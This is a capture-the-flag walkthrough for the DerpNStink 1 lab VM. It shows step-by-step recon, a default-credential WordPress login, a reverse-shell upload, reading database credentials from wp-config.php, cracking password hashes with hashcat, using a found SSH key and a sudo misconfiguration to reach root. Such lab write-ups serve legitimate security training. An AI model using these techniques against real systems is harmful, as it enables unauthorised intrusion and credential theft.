DerpNStink1: CTF walkthrough

Introduction

Name: DerpNStink 1

Date of release: 9 Feb 2018

Author: Bryan Smith

Series: DerpNStink


Enumeration

We can search for the IP address of the VM with arp-scan:

[email protected]:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]            [redacted]                [redacted]
[redacted]            [redacted]                [redacted]
192.168.1.105         00:0c:29:29:33:ed         VMware, Inc.
192.168.1.105         ac:bc:32:80:fa:7f         (Unknown) (DUP: 2)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.450 seconds (104.49 hosts/sec). 4 responded
[email protected]:~$

Then, we can search for open ports:

[email protected]:~$ nmap -A -F -O -sV --reason 192.168.1.105

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-07 03:43 EST
Nmap scan report for 192.168.1.105
Host is up, received arp-response (0.00086s latency).
Not shown: 97 closed ports
Reason: 97 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:29:33:ED (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms 192.168.1.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
[email protected]:~$


First Flag

First of all we have to update our /etc/hosts file with the derpnstink domain name according to this file.

[email protected]:~$ curl http://192.168.1.105/webnotes/info.txt
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --> 
[email protected]:~$

So, we simply have to execute this command:

[email protected]:~$ echo '192.168.1.105        derpnstink.local' >> /etc/hosts

Then, the first flag can be found in the source code of the index.html page.

[email protected]:~$ curl http://derpnstink.local |html2text
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1298  100  1298    0     0   1298      0  0:00:01 --:--:--  0:00:01  158k
h1 style="color:Purple; font-size:250%;">DeRPnStiNK
[derp.png] [stinky.png]
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
[email protected]:~$

Now, we can search for others directories or pages.

That’s why we can, first, use gobuster. After few seconds the weblog directory will appear.

[email protected]:~$ gobuster -u http://derpnstink.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://derpnstink.local
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://derpnstink.local/weblog (Status: 301)
http://derpnstink.local/php (Status: 301)
http://derpnstink.local/css (Status: 301)
http://derpnstink.local/js (Status: 301)
http://derpnstink.local/javascript (Status: 301)
http://derpnstink.local/temporary (Status: 301)
=====================================================
[email protected]:~$

Then, another scan will show us that we have a Wordpress blog.

[email protected]:~$ gobuster -u http://derpnstink.local/weblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://derpnstink.local/weblog/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://derpnstink.local/weblog/wp-content (Status: 301)
http://derpnstink.local/weblog/wp-includes (Status: 301)
http://derpnstink.local/weblog/wp-admin (Status: 301)
=====================================================
[email protected]:~$ 

Finally, we can log in the Wordpress admin panel with these following credentials:

Username Password
admin admin

After a bit of searching, we can see that we can upload arbitrary files when we add a new slide.

PHP reverse shell

Note that I used the basic php-reverse shell from pentestmonkey, basic php-reverse shell who give me a first access to the system.

Low privilege shell


Second Flag

In the system we can log in the mysql service with the credentials that we can find in the /var/www/html/weblog/wp-config.php file.

[email protected]:/var/www/html/weblog$ cat wp-config.php
cat wp-config.php
<?php data-preserve-html-node="true"
[..snip..]
define('DB_NAME', 'wordpress');

/ MySQL database username */
define('DB_USER', 'root');

/ MySQL database password /
define('DB_PASSWORD', 'mysql');

/** MySQL hostname /
define('DB_HOST', 'localhost');

/ Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/ The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

After that, we can find the second flag in the mysql wp_posts table of the wordpress database.

[email protected]:/var/www/html/weblog$ mysql -uroot -pmysql -Dwordpress
[..snip..]
mysql> use wordpress
use wordpress
Database changed
mysql> select * from wp_posts;
[..snipp..]
| closed         | closed      |               | 2-revision-v1 |         |        | 2017-11-13 03:46:02 | 2017-11-13 03:46:02 |                       |           2 | http://derpnstink.local/weblog/2-revision-v1/               |          0 | revision  |                |             0 |
|  8 |           1 | 2017-11-13 05:39:11 | 0000-00-00 00:00:00 | flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
[..snip..]

Moreover, in the wp_users table, another user is present, unclestinky.

mysql> select  from wp_users;
select  from wp_users;
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
| ID | user_login  | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key                           | user_status | display_name | flag2 |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky   | [email protected] |          | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 |           0 | unclestinky  |       |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin         | [email protected]       |          | 2017-11-13 04:29:35 |                                               |           0 | admin        |       |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
2 rows in set (0.00 sec)

We can easily crack this Wordpress hash with hashcat.

[..snip..]
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Time.Started.....: Wed Mar  7 12:57:55 2018 (1 min, 16 secs)
Time.Estimated...: Wed Mar  7 12:59:11 2018 (0 secs)
Guess.Base.......: File (Desktop/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:    37078 H/s (9.24ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2801664/14344385 (19.53%)
Rejected.........: 0/2801664 (0.00%)
Restore.Point....: 2777088/14344385 (19.36%)
Candidates.#2....: westham76 -> wcw32792

Started: Wed Mar  7 12:57:51 2018
Stopped: Wed Mar  7 12:59:12 2018
[..snip..]

We can now use these credentials: |Username|Password| |–|–| |stinky|wedgie57|


Third Flag

The third flag can be found in the Desktop of the stinky user.

[email protected]:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
[email protected]:~/Desktop

For the moment the SSH service can be only used with an private key.

Fortunately for us, a private key is hidden in the /home/stinky/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh folder.

[email protected]:~$ cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
[email protected]:~$

We use this private key to log in the system.

[email protected]:~$ ssh -i privatekey [email protected]
Ubuntu 14.04.5 LTS


                       ,~~~..
                       '  Derrrrrp  N  `
        ,~~~~,       |    Stink      | 
       / ,      \      ',  __ ,"
      /,~|__.      \/
     /~ (__)
    ()  ; (^)(^)':
        =;  _  ;
          ; """"  ;=
   {"}   ' '""' ' _{"}
   \/     >  <   __/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -.   ,'
                ---'

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

  Documentation:  https://help.ubuntu.com/

386 packages can be updated.
305 updates are security updates.

Last login: Wed Mar  7 08:33:30 2018 from 192.168.1.116
[email protected]:~$ 


Fourth Flag

After a bit of searching we can find an interesting conversation located at : ftp/files/network-logs/derpissues.txt and a pcap file in user’s documents.

[email protected]:~$ cat ftp/files/network-logs/derpissues.txt 
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
[email protected]:~$ 
[email protected]:~$ 
[email protected]:~$ ls -la Documents/
total 4300
drwxr-xr-x  2 stinky stinky    4096 Nov 13 01:25 .
drwx------ 12 stinky stinky    4096 Mar  7 08:33 ..
-rw-r--r--  1 root   root   4391468 Nov 13 00:56 derpissues.pcap
[email protected]:~$

If we download and analyse this pcap file with Wireshark we can find the password of the mrderp user.

mrderp password

If we use the user mrderp, we can find a weird files called helpdesk.log in the Desktop. File who give us a link to a pastbin page.

[email protected]:~/Desktop$ cat helpdesk.log
[..snip..]
Closed Ticket Notification

Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw 
Note that the Help Desk's busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
[..snip..]

If we take a look at this pastebin we can see that the /etc/sudoer file appears to contain this rule.

sudoer rule

This rule means that if we create a file named derpy in the /home/mrderp/binaries/ folder we will be able to execute this file with root privilege.

[email protected]:~$ mkdir binaries
[email protected]:~$ touch binaries/derpy.sh
[email protected]:~$ echo '/bin/bash' >> binaries/derpy.sh 
[email protected]:~$ chmod +x binaries/derpy.sh
[email protected]:~$ sudo binaries/./derpy.sh 
[email protected]:~# 

We successfully gain root privilege and we get the last flag of the CTF.

[email protected]:~# cat /root/Desktop/flag.txt 
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
[..snip..]

[email protected]:~#


Flags

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)



break

Comments